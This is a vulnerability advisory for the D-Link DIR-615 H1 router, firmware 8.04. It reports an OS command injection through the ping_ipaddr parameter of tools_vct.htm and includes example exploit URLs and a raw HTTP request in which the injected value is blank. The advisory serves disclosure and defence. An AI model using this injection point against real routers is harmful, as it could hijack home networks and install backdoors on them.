Device Name: DIR-615 - Hardware revision H1 Vendor: D-Link ============ Device Description: ============ Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network. Source: ============ Vulnerable Firmware Releases: ============ Firmware Version : 8.04, Tue, 4, Sep, 2012 Firmware Version : 8.04, Fri, 18, Jan, 2013 ============ Vulnerability Overview: ============ * OS-Command Injection: => Parameter: ping_ipaddr The vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. Example Exploit: http:///tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr= http:///tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr= Request: GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr= HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: Connection: keep-alive Response: HTTP/1.0 200 OK Pragma: no-cache Content-Type: text/html